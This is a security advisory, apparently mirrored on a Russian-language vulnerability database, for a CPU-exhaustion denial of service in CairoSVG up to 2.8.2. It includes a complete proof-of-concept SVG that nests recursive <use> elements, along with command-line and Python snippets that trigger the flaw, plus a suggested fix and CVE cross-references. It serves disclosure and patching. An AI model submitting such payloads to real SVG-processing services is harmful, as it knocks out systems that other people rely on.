GHSA-f38f-5xpm-9r7c

Опубликовано: 13 мар. 2026

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

CairoSVG vulnerable to Exponential DoS via recursive element amplification

Summary

Kozea/CairoSVG has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py (line ~335). This causes CPU exhaustion from a small input.

Vulnerable Code

File: cairosvg/defs.py (line ~335), function use()

The use() function recursively processes <use> elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.

Impact

1,411-byte SVG payload pins CPU at 100% indefinitely
Memory stays flat at ~43MB — no OOM kill, process never terminates
Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able
Amplification factor: O(10^N) rendering calls from O(N) input

Proof of Concept

Save as poc.svg and run timeout 10 cairosvg poc.svg -o test.png:

<?xml version="1.0"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <defs> <g id="a"><rect width="1" height="1"/></g> <g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g> <g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g> <g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g> <g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g> </defs> <use xlink:href="#e"/> </svg>

Expected: timeout kills the process after 10 seconds (it never completes on its own).

Alternatively test with Python:

import cairosvg, signal signal.alarm(5) # Kill after 5 seconds try: cairosvg.svg2png(bytestring=open("poc.svg").read()) except: print("[!!!] CONFIRMED: CPU exhaustion — process did not complete in 5s")

Suggested Fix

Add recursion depth counter to use() function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.

References

CWE-400

Credit

Kai Aizen (SnailSploit) — Adversarial AI & Security Research

Ссылки

Пакеты

Наименование

CairoSVG

pip

Затронутые версииВерсия исправления

<= 2.8.2

2.9.0

EPSS

Процентиль: 17%

0.00055

Низкий

7.5 High

CVSS3

CVE ID

CVE-2026-31899

Дефекты

CWE-400

Связанные уязвимости

CVE-2026-31899

CVSS3: 7.5

ubuntu

14 дней назад

CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to Kozea/CairoSVG has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py. This causes CPU exhaustion from a small input.

CVE-2026-31899

CVSS3: 7.5

redhat

14 дней назад

A flaw was found in CairoSVG, an SVG converter. A remote attacker could exploit this vulnerability by submitting a specially crafted SVG file that contains recursive `<use>` elements. This can lead to an exponential increase in processing time and CPU exhaustion, resulting in a Denial of Service (DoS) for the system.

CVE-2026-31899

CVSS3: 7.5

nvd

14 дней назад

CVE-2026-31899

CVSS3: 7.5

debian

14 дней назад

CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Pr ...

EPSS

Процентиль: 17%

0.00055

Низкий

7.5 High

CVSS3

CVE ID

CVE-2026-31899

Дефекты

CWE-400